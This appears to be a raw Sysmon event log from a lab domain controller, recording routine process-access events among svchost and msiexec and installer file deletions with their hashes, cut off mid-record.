14:58:27.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.435{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.419{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.419{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14003500C:\Windows\system32\msiexec.exe{A7A01FEF-EC12-607E-420E-00000000BB01}6316C:\Windows\SysWOW64\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19dedd|C:\Windows\system32\Msi.dll+2ea6e|C:\Windows\system32\Msi.dll+474c5|C:\Windows\system32\Msi.dll+10a3b5|C:\Windows\system32\Msi.dll+1095d6|C:\Windows\system32\Msi.dll+f3bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.419{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.404{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d082a2.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.404{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.404{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.404{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.404{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.404{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.404{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.388{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC12-607E-420E-00000000BB01}6316C:\Windows\SysWOW64\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.357{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EC12-607E-420E-00000000BB01}6316C:\Windows\SysWOW64\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.310{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC12-607E-420E-00000000BB01}6316C:\Windows\SysWOW64\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.248{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.248{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+2670d5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+266c0b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+456ba5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4550ae|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.216{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=5C30F4261F482C0FDC52168C5E61922A,SHA256=4F94C4090F8C6455ACFD97BB659F0BCE7531B1048C81C4E34DD6FD2852DDF689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF23C119992E7C9176.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF8F29BBEA84EF5DF9.TMPMD5=5C30F4261F482C0FDC52168C5E61922A,SHA256=4F94C4090F8C6455ACFD97BB659F0BCE7531B1048C81C4E34DD6FD2852DDF689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFB6072B8C782907F0.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF72B7482944EBFAAB.TMPMD5=5C30F4261F482C0FDC52168C5E61922A,SHA256=4F94C4090F8C6455ACFD97BB659F0BCE7531B1048C81C4E34DD6FD2852DDF689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.201{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0829e.msiMD5=AF9E178233F0AA84B0082AF57B871733,SHA256=EEDDA6B099C601546148F8A47921F00961199FB3AE9319C32A726A381B66C846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.169{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFFCD7F3BB5E10A24F.TMPMD5=2C0F9FF2B2A73798827BC6A652C51D7A,SHA256=789AC106BDC7D96D9AC5EAAFBD9B21320D05E84FE2E3991677F047A3CAF982D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.169{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF6B83021A833EC41E.TMPMD5=B022A699890DB783D2203D1F9A0A9F0D,SHA256=9613AB0D7FAFC6CF523AD340A28D617E0E3064C303F4DA6653476F600FA77099,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.169{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d082a0.rbsMD5=072E0E14A575CE76031667B4B8D53D03,SHA256=6BD2DA9A1393A7A82AF02A7CFED49FEB3775D59DAF062C275B2140E1AE025A20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.154{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFF98E45E7F6C39402.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 11241100x800000000000000079530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.154{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft 